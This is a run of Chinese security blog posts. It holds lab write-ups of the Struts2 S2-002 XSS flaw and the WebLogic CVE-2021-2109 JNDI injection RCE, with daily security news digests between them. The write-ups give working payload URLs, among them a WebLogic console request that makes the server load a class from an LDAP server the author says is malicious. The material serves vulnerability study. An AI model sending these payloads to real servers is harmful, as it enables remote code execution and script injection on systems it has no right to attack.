0x01 前言 复现一下 S2-002 的洞 0x02 S2-002 漏洞简介 Struts2-002 是一个 XSS 漏洞，该漏洞发生在 s:url 和 s:a 标签中，当标签的属性 includeParams=all 时，即可触发该漏洞。 漏洞影响版本 Struts 2.0.0 - Struts 2.1.8.1 0x03 环境搭建 如果不想手动搭建的话，环境我已经配好了 https://github.com/Drun1baby/JavaSecurityLearning/tree/main/JavaSecurity/Struts2/S2-002AndS2-006 因为 s2-002 的洞是一个 XSS，与处理的 Action 没有任何关系，所以这里我们只需要配置 .jsp 文件，以及 .xml 文件 resources 文件夹下 struts.xml <?xml version="1.0" encoding="UTF-8"?>     <!DOCTYPE struts PUBLIC          "-//Apache Software Foundation//DTD Struts Configuration 2.0//EN"          "http://struts.apache.org/dtds/struts-2.0.dtd">     <struts>      <package name="S2-002" extends="struts-default">          <action name="login" class="com.drunkbaby.action.LoginAction" method="execute">              <result name="success">welcome.jsp</result>              <result name="error">index.jsp</result>          </action>      </package>   </struts> webapp 文件夹下 index.jsp <%@ page language="java" contentType="text/html; charset=UTF-8"           pageEncoding="UTF-8"%>   <%@ taglib prefix="s" uri="/struts-tags" %>     <html>   <head>      <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">      <title>S2-002</title>   </head>   <body>   <h2>S2-002 Demo</h2>   <s:url action="login" includeParams="all"></s:url>   <s:a href="%{url}">click</s:a>   </body>   </html> welcome.jsp <%@ page language="java" contentType="text/html; charset=UTF-8"           pageEncoding="UTF-8"%>   <%@ taglib prefix="s" uri="/struts-tags" %>     <html>   <head>    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">    <title>S2-002</title>   </head>   <body>   <p>Hello <s:property value="username"></s:property></p>   </body>   </html> 接着在 WEB-INF 下，web.xml <!DOCTYPE web-app PUBLIC   "-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN"   "http://java.sun.com/dtd/web-app_2_3.dtd" >     <web-app>    <display-name>S2-002 Example</display-name>    <filter>      <filter-name>struts2</filter-name>      <filter-class>org.apache.struts2.dispatcher.FilterDispatcher</filter-class>    </filter>    <filter-mapping>      <filter-name>struts2</filter-name>      <url-pattern>/*</url-pattern>    </filter-mapping>    <welcome-file-list>      <welcome-file>index.jsp</welcome-file>    </welcome-file-list>   </web-app> 项目结构如图，至此环境搭建完毕 0x04 漏洞复现与分析 http://localhost:8080/?%22%3E%3Cscript%3Ealert(1)%3C/script%3E%3C%22 漏洞分析 之前自己也没有分析过 XSS 相关的漏洞，在最后我会做一个小结来思考一下如何自己挖掘出这个漏洞 我们先下一个断点在 org.apache.struts2.views.jsp.ComponentTagSupport#doStartTag() 方法处，开始调试 当在 JSP 文件中遇到 Struts2 标签 <s: 时，程序会先调用 doStartTag() 方法 ，并将标签中的属性设置到对应标签对象相应属性中。最后，在遇到 /> 结束标签的时候调用 doEndTag() 方法。 进入到了 index.jsp 跟进 this.component.start() 在 index.jsp 中 includeParams=all，往下看代码知道 88 行，跟进 mergeRequestParameters() 方法 在 includeParams=all 的情况下会调用 mergeRequestParameters() 将 Tomcat 处取来的参数，这里取到了我们输入的 payload，并且保存在 this.parameters 中 mergeRequestParameters() 方法运行完毕，往下是 includeGetParameters() 方法，也跟进去看一下；发现也是调用了 mergeRequestParameters()，同样是保存在了 this.parameters 中，不过这一次保存的是经过 url 编码的数据 继续往下，程序还调用了 includeExtraParameters() 方法，跟进；这里的意思是如果有额外的参数，会被保存进这里，然后再保存到 this.paramters 其实到这里漏洞出发点就来了，第一次调用 mergeRequestParameters() 方法的时候那一段参数是未经过 URL 编码的，从而产生了 XSS 在执行完毕 doStartTag() 方法之后，会去到 doEndTag() 方法，我们跟进 this.component.end()，this.component 是 URL 类，所以也就是调用了 URL.end() 往下走，第 146 行，判断目前调度器（Dispatcher）的实例是否支持这一 Struts2 组件的行为，并且判断这一个请求是否需要 Struts2 组件调用某 Action 来处理；如果不需要调用 Action 处理，则直接进入 buildUrl() 的代码逻辑，如果需要 Action 来处理，会先去选择/调用 Action，再进行后续操作。 其实也就是 Struts2 运行的基本逻辑 此处因为我们定义了 action=login，所以进入到了 else 的代码逻辑，跟进 this.determineActionURL() 方法 determineActionURL() 方法先定位到了对应的 action，再进行 buildUrl() 的操作，跟进 buildUrl() 再跟进 此时的 params 即将会被拿去拼接，造成触发 XSS 漏洞 具体拼接是在 115 行的 buildParametersString() 方法，跟进再跟进 至此，漏洞分析结束 漏洞修复 修改 pom.xml，将 Struts2 版本提升至 2.0.11（这是根据公告的，其实并没有真正解决漏洞） 经过对 2.0.11.1 的代码阅读，在 UrlHelper 类 buildUrl() 方法里，第 136 行增加了如下修复代码: // link是最终的生成的url        for(result = link.toString();        result.indexOf("<script>") > 0;        result = result.replaceAll("<script>", "script")) {       } 太鸡肋，基本算不上修复。。。 0x05 小结 因为是 XSS 漏洞，成因基本都是未进行 URL 编码或某种转码，所以我们可以去看处理参数的过程进行漏洞挖掘。 S2-002 还是比较简单的一个漏洞。

1、研究人员发现针对Redis服务器的Cryptojacking勒索攻击 https://securityaffairs.com/142910/cyber-crime/cryptojacking-campaign-targets-redis.html Cado Labs研究人员最近发现了一个新的勒索攻击活动，其目标是配置不安全Redis的数据库服务器。该活动背后的威胁参与者使用了免费和开源的合法命令行文件传输服务transfer.sh，可能以此来逃避检测。 2、英国零售商WH Smith披露员工数据泄露事件 https://www.govinfosecurity.com/british-retailer-wh-smith-discloses-breach-employee-data-a-21350 机场特许经营商和主要街道零售商 WH Smith 是近几个月来最新一家宣布遭到黑客攻击并遭受数据泄露的英国大企业。WH Smith 周四表示，它遭受了网络攻击，导致与现任和前任员工有关的数据暴露。这家总部位于英国斯温顿的公司在伦敦证券交易所上市，该公司表示，似乎没有关于客户的信息被泄露，其网站也没有受到攻击的影响。 3、报告称攻击者将新漏洞投入攻击的间隔逐渐缩短 https://www.helpnetsecurity.com/2023/03/03/attackers-developing-deploying-exploits/ 据Rapid7称，虽然 2022 年新漏洞的广泛利用有所减少，但由于广泛的机会主义攻击继续构成威胁，风险仍然很大。攻击者正在以前所未有的速度开发和部署漏洞。56%的漏洞在公开披露后 7 天内被利用——比 2021 年增加12%，比2020年增加 87%。在2022年，利用时间的中位数仅为一天。 4、Play勒索软件声称对奥克兰市进行了破坏性攻击 https://www.bleepingcomputer.com/news/security/play-ransomware-claims-disruptive-attack-on-city-of-oakland/ Play勒索软件团伙声称对自2月中旬以来对奥克兰市的IT系统进行的网络攻击负责。奥克兰是加利福尼亚州旧金山湾区东侧的一座城市，人口约44万。该市是该地区的经济主力。该市当局告知公众，它已于 2023 年 2 月 10 日成为 勒索软件攻击的目标 。它影响了除 911 调度、消防应急服务和城市金融系统之外的所有网络系统。 5、数万个网站因被网络攻击而重定向到不良网站 https://securityaffairs.com/142975/hacking/ftp-credentials-traffic-redirection-campaign.html 网络安全公司 Wiz 报告称，自2022年9月上旬以来，威胁者入侵了数万个针对东亚受众的网站，将数十万用户重定向到不良主题内容。威胁行为者使用用于管理 Web 应用程序的 FTP 客户端的合法凭据获得了对网站的访问权限。在某些情况下，攻击者使用的密码很强，不太可能包含在用于暴力攻击的字典中。 6、微软与MITRE联合推出针对机器学习的安全工具 https://www.helpnetsecurity.com/2023/03/03/microsoft-mitre-plug-in/ 由Microsoft和MITRE创建的新插件集成了各种开源软件工具，以帮助网络安全专业人员加强对机器学习 (ML) 系统攻击的防御。Arsenal工具实施了MITRE ATLAS框架中定义的战术和技术，并与 Microsoft 的 Counterfit 协作构建为自动对抗攻击库，因此安全从业者可以准确地模拟对包含 ML 的系统的攻击，而无需深入了解机器学习或人工智能。 7、研究人员发现针对ATM的新型恶意软件FiXS https://securityaffairs.com/143022/malware/fixs-atm-malware-mexican-banks.html Metabase Q的研究人员发现了一种名为 FiXS 的新型 ATM 恶意软件，自 2023 年 2 月以来，该恶意软件被用于攻击墨西哥银行，该名称来自二进制文件中恶意软件的字符串代号。 8、谷歌云平台日志缺陷可能使数据泄露难以发现 https://www.helpnetsecurity.com/2023/03/01/gcp-data-exfiltration/ Mitiga 研究人员发现，攻击者可以窃取存储在谷歌云平台 (GCP) 存储桶中的公司数据，而不会在 GCP 的存储访问日志中留下明显的恶意活动取证痕迹。“这很容易导致数千或数百万次读取事件。无法识别特定的攻击模式，例如下载或复制到外部存储桶，这使得组织很难确定是否以及哪些信息被盗。” 9、报告称2022年网络钓鱼造成损失增加76% https://www.hipaajournal.com/losses-to-phishing-attacks-increased-by-76-in-2022/ 根据 Proofpoint 最近发布的 2023 年网络钓鱼状况报告，去年网络钓鱼攻击造成的损失增加了 76%，近三分之一的公司因成功的网络钓鱼攻击而蒙受损失。2022 年，超过五分之四的受访组织至少经历了一次成功的网络钓鱼攻击，其中超过一半的组织至少经历了三次成功的网络钓鱼攻击。 10、无锡销毁首批10亿条涉疫个人数据 https://www.freebuf.com/news/359237.html 据无锡博报报道，3 月 2 日，按照《中华人民共和国数据安全法》《中华人民共和国个人信息保护法》等法律法规有关规定，无锡市举行涉疫个人数据销毁仪式，首批销毁数据 10 亿条，为确保数据彻底销毁、无法还原，邀请了第三方审计和公证处参与工作。 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

1、攻击者使用GootLoader和SocGholish恶意软件攻击律师事务所 https://securityaffairs.com/142888/cyber-crime/law-firms-gootloader-socgholish-malware.html eSentire 的研究人员在2023年1月和2月期间阻止了针对 6 家不同律师事务所的10次网络攻击。这些公司是两起旨在分发GootLoader和FakeUpdates（又名 SocGholish）恶意软件的不同攻击活动的一部分。 2、BidenCash网站上泄露了超过200万条信用卡信息 https://www.hackread.com/bidencash-leaks-2-million-credit-cards/ BidenCash是一个臭名昭著的在暗网和公网上都运行的银行卡市场，向公众提供被盗的信用卡详细信息。作为其周年促销活动的一部分，已经泄露了超过200万张有效信用卡。一年前泄露的数据集包含来自世界各地的银行卡信息，其中有相当一部分是在美国、中国、墨西哥、印度、加拿大和英国发行的。泄露的信息包括持卡人的全名、卡号、银行详细信息、有效期、卡验证值 (CVV) 号码、家庭住址和超过 500000 个电子邮件地址。 3、思科修复了IP电话中的多个Web UI RCE漏洞 https://www.bleepingcomputer.com/news/security/cisco-patches-critical-web-ui-rce-flaw-in-multiple-ip-phones/ 思科解决了在多个IP电话型号的 Web UI 中发现的一个严重安全漏洞，未经身份验证的远程攻击者可以利用该漏洞进行远程代码执行 (RCE) 攻击。RCE 漏洞 (CVE-2023-20078) 允许攻击者注入任意命令，这些命令将在成功利用后以 root 权限执行。该公司今天还披露了第二个高危漏洞 (CVE-2023-20079)，该漏洞可被用来触发拒绝服务 (DoS) 。这两个 4、卡巴斯基发布《2022 年移动恶意软件威胁形势》报告 https://www.secrss.com/articles/52354 2022 年检测到 1661743 个恶意软件或不需要的软件安装程序，比 2021 年少了 1803013 个，该数字自 2020 年的增长以来一直在逐步下降。 5、GunAuction 网站被黑，56.5 万个账户数据被泄露 https://securityaffairs.com/142920/data-breach/gunauction-site-data-breach.html 黑客入侵了GunAuction.com，这是一个允许人们买卖枪支的网站。攻击者窃取了超过 550,000 名用户的敏感个人数据。泄露的客户数据包括全名、家庭住址、电子邮件地址、明文密码和电话号码。 6、Cryptojacking 活动针对配置错误的Redis 服务器 https://securityaffairs.com/142910/cyber-crime/cryptojacking-campaign-targets-redis.html Cado Security 的研究人员发现了针对配置错误的 Redis 数据库服务器的加密劫持活动。 7、黑客利用容器化环境窃取专有数据和软件 https://thehackernews.com/2023/03/hackers-exploit-containerized.html 一项名为SCARLETEEL 的复杂攻击活动针对容器化环境，以窃取专有数据和软件。Sysdig在一份新报告中表示：“攻击者利用容器化工作负载，然后利用它对 AWS 账户执行权限升级，以窃取专有软件和凭证。” 8、Aruba Networks 修复了 ArubaOS 中的六个关键漏洞 https://www.bleepingcomputer.com/news/security/aruba-networks-fixes-six-critical-vulnerabilities-in-arubaos/ Aruba Networks 发布了一份安全公告，告知客户影响其专有网络操作系统 ArubaOS 多个版本的六个严重漏洞。这些缺陷会影响 Aruba Mobility Conductor、Aruba 移动控制器以及 Aruba 管理的 WLAN 网关和 SD-WAN 网关。 9、2022 年政府断网次数创新记录 https://www.solidot.org/story?sid=74263 根据 Access Now 的报告，2022 年政府断网次数创新记录，35 个国家的政府断网至少 187 次，近半数断网发生在印度。 10、白宫发布国家网络安全战略 https://www.securityweek.com/white-house-releases-national-cybersecurity-strategy/ 美国国家网络安全战略推动监管、积极的“黑客攻击”行动。 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

0x01 前言 学习一下 WebLogic JNDI 注入 RCE（CVE-2021-2109） 0x02 环境搭建 和之前 WebLogic 的环境搭建是一致的，本文不再赘述。 不过值得一提的是，我的 weblogic 版本是 10.3.6；需要手动添加 \server\lib\consoleapp\webapp\WEB-INF\lib\console.jar 到依赖里面 0x03 漏洞分析与复现 漏洞影响版本与前提条件 Oracle WebLogic Server 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0。 拥有访问 /console/consolejndi.portal 页面的用户权限，或者存在 CVE-2020-14883 未授权访问漏洞。关于未授权的漏洞我会放到 WebLogic 的另外一篇文章中再做分析 漏洞原理 WebLogic 的 /console/consolejndi.portal 接口可以调用存在 JNDI 注入漏洞的 com.bea.console.handles.JndiBindingHandle 类，从而造成 RCE。 漏洞复现 payload 如下 http://127.0.0.1:7001/console/css/%252e%252e%252fconsolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://127.0.0;1:1389/aew0xy;AdminServer%22)&&我本地开启了一个 JNDI 的 Evil Class 和 Server 用 payload 打成功 漏洞分析 根据 payload 分析，先从 consolejndi.portal 开始看起，.portal 文件就类似于一个 servlet，在 consolejndi.portal 中存在 JNDI Binding 操作的处理容器，如图 具体的处理逻辑在 /PortalConfig/jndi/jndibinding.portlet 去到 com.bea.console.actions.jndi.JNDIBindingActioncom.bea.console.actions.jndi.JNDIBindingAction 类中，发现存在一个 execute() 方法，疑似存在 jndi 注入的漏洞。 观察需要如何构造恶意 payload，c 是由 ConsoleUtils.initNamingContext(serverMBean); 得来，而 serverMBean 是通过 domainMBean.lookupServer(serverName); 得来，其中一系列关系我将会由下图说明 接着我们自上而下顺序看代码，先是强转了一个 JndiBindingHandle 类，这里面 getHandleContext() 的逻辑并不复杂，最终会调用 JndiBindingHandle 的构造函数。 如图，我们在 payload 当中的这一段被放进了构造函的 type 与 objectIdentifier 中，而 "ldapxxxx" 这一段会被放在 components 中，由分号分隔 JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle("ldap://127.0.0;1:1389/aew0xy;AdminServer") 继续往下看，我们想要进入 JNDI 注入的那一段代码，需要满足两个条件，一个是 serverMBean != null，另一个是 c != null，我们进到 serverMBean 看一下代码逻辑 lookupServer 是 DommainMBean 接口的方法，我们去看它的实现类 实际上这里是动态代理调用的，会自动跟进到 weblogic.management.jmx.MBeanServerInvocationHandler#invoke 下，其中 method 的值为 weblogic.management.configuration.DomainMBean#lookupServer，它的 method 代码逻辑在实现类当中，也就是 weblogic.management.configuration.DomainMBeanImpl#lookupServer 我们需要走到 do while 的逻辑里面，返回 var3，而不是返回 null 通过调试得到 var2 的值为 AdminServer，这里没有其他的值了，原因如图 所以此处要求我们输入的 var1 与 AdminServer 相同，回过头去看 var1 是什么呢，var1 其实是 serverName 发现 serverName 也是可控的 现在 serverBean != null 没问题，就要看 jndi lookup 的地址是否可控。 很明显，jndi lookup 的地址也是可控的 我们进到 JndiBindingHandle 类去看一下 set/getComponents() 的逻辑，先调用了 HandleImpl#getComponent 跟进 主要逻辑就是在讲，以 ; 分隔，如此一来，我们就可控 context 与 binding，可以进行 jndi 注入 最后捋一下整体条件 1、;号隔开 jndi 地址2、serverName 必须为 AdminServer 0x04 漏洞修复 根据 Y4er 师傅这里的说法是，对 Jndi 的黑名单进行了判断，如图 0x05 小结 不算难的一个漏洞，只是环境搭建当时踩了很多坑，欢迎师傅们与我交流踩坑问题，我会竭力帮助。

1、APT-C-36(盲眼鹰)组织针对哥伦比亚发起攻击 https://blogs.blackberry.com/en/2023/02/blind-eagle-apt-c-36-targets-colombia APT-C-36（也称为盲眼鹰）至少自 2019 年以来一直在积极瞄准哥伦比亚和厄瓜多尔的组织。它依靠发送给特定公司的鱼叉式网络钓鱼电子邮件来开展攻击活动。2 月 20 日，黑莓研究和情报团队发现了一起新的活动，攻击者冒充哥伦比亚政府税务机构，针对哥伦比亚的关键行业，包括该国内卫生、金融、执法、移民和负责和平谈判的机构。 2、攻击者利用Parallax RAT攻击加密货币组织 https://www.uptycs.com/blog/cryptocurrency-entities-at-risk-threat-actor-uses-parallax-rat-for-infiltration 自2019年12月以来，Parallax RAT已通过垃圾邮件活动或网络钓鱼电子邮件（带附件）传播。该恶意软件执行的恶意活动包括读取登录凭据、访问文件、键盘记录、远程桌面控制等。Uptycs威胁研究团队最近检测到针对加密货币组织的Parallax远程访问木马 (RAT) 的活跃样本。它使用注入技术隐藏在合法进程中，使其难以检测。一旦成功注入，攻击者就可以通过可能用作通信渠道的Wi 3、LockBit对印度投资公司IL&FS实施了攻击 https://blog.cyble.com/2023/03/01/ransomware-attack-on-ilfs/ 勒索软件组织LockBit声称已于2023年2月28日入侵了一家印度投资公司Infrastructure Leasing & Financial Services Limited (IL&FS) 的网络。据称，勒索组织泄露了大量数据，包括合同、个人数据、护照、邮政信件和财务文件。为了表明数据的真实性，该组织发布了12张泄露数据的屏幕截图，泄露网站上的代码显示截止日期为2023年3月10日。之后，LockBit组织威胁要从他们失陷的服务器中删除数据并公开泄露。这是他们勒索受 4、Dish证实此前服务异常的原因为勒索攻击 https://www.bleepingcomputer.com/news/security/dish-network-confirms-ransomware-attack-behind-multi-day-outage/ 卫星广播提供商和电视巨头 Dish Network 最终证实，勒索软件攻击是导致周五开始的多日网络和服务中断的原因。据The Verge称，Dish Network 首先将网络和服务中断归咎于 VPN 问题 。在28日向美国证券交易委员会 (SEC) 提交的8-K 表格中，Dish Network表示“确定中断是由于网络安全事件造成的，并通知了相应的执法机构。”该公司补充 5、加拿大将禁止在政府移动设备上使用 TikTok https://securityaffairs.com/142880/security/canada-bans-tiktok-government-devices.html 加拿大政府宣布，出于安全考虑，将禁止所有政府员工的设备使用视频应用程序 TikTok。 6、BlackLotus 成为首个Windows 11 上绕过 UEFI 安全启动的 bootkit https://securityaffairs.com/142864/malware/blacklotus-bootkit-bypass-secure-boot-win11.html ESET 的研究人员发现了一种名为BlackLotus的新型隐蔽统一可扩展固件接口 ( UEFI ) 引导工具包，它能够绕过Windows 11 上的安全引导。BlackLotus 是第一个能够在完全最新的 Windows 11 系统上绕过安全功能的 UEFI bootkit。BlackLotus 恶意软件是一种 UEFI bootkit，至少从 2022 年 10 月起就可以在黑客论坛上出售。这款功能强大的恶 7、谷歌本周为 Workspace 客户全面开放Gmail 和日历的客户端加密 https://www.securityweek.com/google-workspace-client-side-encryption-now-generally-available-in-gmail-calendar/ 谷歌本周宣布，Gmail 和日历的客户端加密 (CSE) 现在已对 Workspace 客户全面开放使用。 8、视频营销软件 Animker 泄露大量用户数据 https://www.hackread.com/video-marketing-software-animker-data-leak 一个配置错误的数据库暴露了属于 getshow.io（一个一体化视频营销平台）和 animaker.com（一个 DIY 视频动画软件）网站的超过 700,000 名用户的测试和个人数据。 9、Lazarus 组织开始在攻击中应用反取证技术 https://www.freebuf.com/articles/network/358698.html 10、亚马逊、波音、宝马等软件供应商Beeline数据库遭攻击 https://www.freebuf.com/articles/database/359008.html 当地时间2月28日消息，美国软件公司Beeline的数据库被攻击者发布在黑客论坛上，数据库内包含亚马逊、瑞士信贷、3M、波音、宝马、戴姆勒、摩根大通、麦当劳、蒙特利尔银行等Beeline客户的数据。 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

1、研究人员发现WordPress插件存在两个严重漏洞 https://www.bleepingcomputer.com/news/security/critical-flaws-in-wordpress-houzez-theme-exploited-to-hijack-websites/ Patchstack的威胁研究人员Dave Jong发现，黑客正在积极利用Houzez主题和WordPress插件中的两个严重漏洞，这两个插件主要用于房地产网站。第一个Houzez漏洞被追踪为CVE-2023-26540，其严重等级为9.8（满分10.0）。这是一个影响Houzez主题插件2.7.1及更早版本的安全配置错误，可以在不需要身份验证的情况下远程利用 2、CISA警告称ZK Java Web框架的高严重性漏洞被积极利用 https://thehackernews.com/2023/02/cisa-issues-warning-on-active.html 美国网络安全和基础设施安全局 (CISA) 根据主动利用的证据，将一个影响ZK框架的高严重性漏洞添加到其已知被利用漏洞（KEV）目录中。该漏洞被跟踪为CVE-2022-36537（CVSS分数：7.5），影响ZK框架版本9.6.1、9.6.0.1、9.5.1.3、9.0.1.2和8.6.4.1，并允许威胁参与者通过特制的请求检索敏感信息。该漏洞已于2022年5月在版本9.6.2、9.6.0.2、9.5.1.4、9.0.1.3和8.6.4.2中进行了修补。N 3、美国法警署证实遭遇重大安全漏洞敏感信息泄露 https://www.nbcnews.com/politics/politics-news/major-us-marshals-service-hack-compromises-sensitive-info-rcna72581 多名美国高级执法官员周一表示，美国法警署（U.S. Marshals Service）在一个多星期前遭遇安全漏洞，泄露了敏感信息。在周一的一份声明中，美国法警署发言人Drew Wade承认了这一违规行为，并表示：“受影响的系统包含执法敏感信息，包括法律程序的申报、行政信息以及与美国法警署调查对象有关的个人身份信息，其中还包含法警署的员工。”Wade称该事件发生在2月 4、重磅！《数字中国建设整体布局规划》发布 https://www.freebuf.com/news/358940.html 近日，中共中央、国务院印发了《数字中国建设整体布局规划》（以下简称《规划》），并发出通知，要求各地区各部门结合实际认真贯彻落实。 5、卡巴斯基报告显示：2022年手机银行木马数量暴涨100% https://www.freebuf.com/news/358895.html 2月27日，卡巴斯基公布的《2022 年移动威胁》显示，去年出现了近20万个新型手机银行木马，比前一年增长了 100%，达到了近六年来的最快增幅。 6、IDC：网络安全AI投资进入爆发期 https://www.secrss.com/articles/52284 根据IDC的预测，未来五年网络安全AI市场的复合年增长率为23.6%，2027年市值将达到463亿美元。 7、荷兰警方拘捕3名参与大规模数据盗窃和勒索计划的黑客 https://thehackernews.com/2023/02/dutch-police-arrest-3-hackers-involved.html 当地时间27日消息，荷兰警方宣布逮捕三名与涉及数据盗窃、勒索和洗钱的“大规模”犯罪行动有关的人。 8、Bitdefender 发布MortalKombat勒索软件解密器 https://thehackernews.com/2023/02/bitdefender-releases-free-decryptor-for.html Bitdefender发布了一款免费解密器，适用于名为MortalKombat的新型勒索软件。MortalKombat 是 2023 年 1 月出现的一种新勒索软件变种。它基于名为 Xorist 的商品勒索软件，在针对美国、菲律宾、英国和土耳其实体的攻击中被观察到。 9、新的 EX-22 工具使黑客能够对企业进行隐蔽的勒索软件攻击 https://thehackernews.com/2023/02/new-ex-22-tool-empowers-hackers-with.html 一种名为 EXFILTRATOR-22（又名 EX-22）的新后利用框架已经出现，其目标是在企业网络中部署勒索软件，同时具有高度隐蔽性。 10、TPM 2.0 规范中的安全缺陷使设备易受代码执行攻击 https://www.securityweek.com/security-defects-in-tpm-2-0-spec-raise-alarm-bells/ Quarkslab 的安全研究人员在可信平台模块 (TPM) 2.0 参考库规范中发现了一对严重的安全缺陷，促使跨供应商开展大规模工作来识别和修补易受攻击的安装。 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

1、国家网信办发布《个人信息出境标准合同办法》 https://www.freebuf.com/news/358759.html 2月24日，国家互联网信息办公室公布《个人信息出境标准合同办法》（以下简称《办法》），自2023年6月1日起施行。 2、PlugX RAT 伪装成合法的 Windows 工具进行分发 https://securityaffairs.com/142770/malware/plugx-trojan-disguised-windows-tool.html 趋势科技发现了新一波攻击，旨在分发 伪装成名为 x32dbg 的开源 Windows 调试器工具的PlugX 远程访问木马。合法工具允许检查内核模式和用户模式代码、故障转储或 CPU 寄存器。 研究人员分析的x32dbg.exe具有有效的数字签名，因此某些安全工具认为它是安全的。它的使用允许威胁行为者避免检测、保持持久性、提升权限和绕过文件执行限制。 3、ChromeLoader 活动使用 VHD 文件伪装成破解游戏和盗版软件 https://securityaffairs.com/142740/cyber-crime/chromeloader-malware-vhd-files.html Ahnlab 安全应急响应中心 ( ASEC ) 的研究人员最近发现了一个使用 VHD 文件分发ChromeLoader 的恶意软件活动。ChromeLoader 是一种恶意的 Chrome 浏览器扩展程序，它被归类为一种普遍存在的浏览器劫持程序，可以修改浏览器设置以重定向用户流量。这些 VHD 文件伪装成流行的任天堂和 Steam 游戏的应用程序和破解或破解，包括 ELDEN RING、黑暗之魂 3、荒野大镖客救赎 2、使命召 4、LastPass 称 DevOps 工程师家用电脑被黑 https://www.securityweek.com/lastpass-says-devops-engineer-home-computer-hacked/ 密码管理软件公司 LastPass 表示，其一名 DevOps 工程师的个人家用电脑遭到黑客攻击并植入了键盘记录恶意软件，这是持续性网络攻击的一部分，从云存储资源中窃取了公司数据。 5、PureCrypter 恶意软件以亚太地区和北美的政府实体为目标 https://thehackernews.com/2023/02/purecrypter-malware-targets-government.html 亚太地区和北美的政府实体正成为未知威胁行为者的目标，该威胁行为者使用名为 PureCrypter 的现成恶意软件下载器来提供一系列信息窃取程序和勒索软件。 6、美国石油生产商Encino Energy遭勒索软件攻击 https://therecord.media/encino-energy-cyberattack-alleged-data-leak-alphv/ Encino Energy是美国最大的私人天然气和石油生产商之一，该公司表示已调查并修复了最近网络攻击造成的影响。上周早些时候，ALPHV勒索软件团伙将该公司添加到其数据泄露网站。Encino Energy发言人Jackie Stewart说：“ Encino Energy之前就意识到了未经授权的活动，调查了该行动并对问题进行了补救。我们的业务没有受到影响，我们将继续照常运营。”该公司是俄亥俄州最大的石油生产商，没有透露攻击发生的时间，也不清楚 7、研究人员发现钓鱼邮件冒充航运公司窃取用户凭据 https://asec.ahnlab.com/en/48304/ AHNLAB安全紧急响应中心最近发现，冒充航运公司的恶意电子邮件正在韩国传播。这些电子邮件提示用户打开主题为“提交进口清关信息”的附加文件。附件的HTML文件是一个登录页面，当用户尝试登录时，登录页面会将他们输入的密码发送到攻击者的服务器。之后，用户将被定向至上传到个人OneDrive Cloud Storage帐户的Excel文件。但是连接到该链接的Excel文件无法打开，因为它超过了文件大小限制。连接到Excel文件的屏幕旨在欺骗用户，使用户很难立即意识到他们在输入帐户凭据后信息被窃取。 8、数百个 Docker 容器镜像中隐藏漏洞，下载量高达数十亿次 https://www.helpnetsecurity.com/2023/02/23/hidden-vulnerabilities-docker-containers/ Rezilion 发现了数百个 Docker 容器镜像的存在，这些镜像包含了大多数标准漏洞扫描器和 SCA 工具都没有检测到的漏洞。 9、美国电视广播巨头Dish Network遭网络攻击，网站、应用程序离线 https://www.freebuf.com/news/358788.html 美国电视巨头和卫星广播供应商Dish Network在过去24小时内神秘断网，其网站和应用程序停止运作。大范围的中断影响了Dish.com、Dish Anywhere应用程序以及该公司拥有的几个网站和网络。同时该公司的呼叫中心电话也无法接通。此外，客户在通过他们的Dish凭证登录MTV和Starz等电视频道应用程序时面临认证问题。Dish Network的远程员工已经也被禁止访问其工作系统。 10、假亚马逊 Prime 电子邮件滥用 LinkedIn 的 URL 缩短器 https://www.malwarebytes.com/blog/news/2023/02/linkedin-slinks-abused-to-phish-email-and-payment-details 在过去的几天里，诈骗者一直在发送网络钓鱼电子邮件，这些电子邮件用一种叫做 Slinks 的东西伪装虚假 URL——缩短的 Linkedin URL。现在，它们被用于基于亚马逊广受欢迎的 Prime 会员资格的骗局。 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

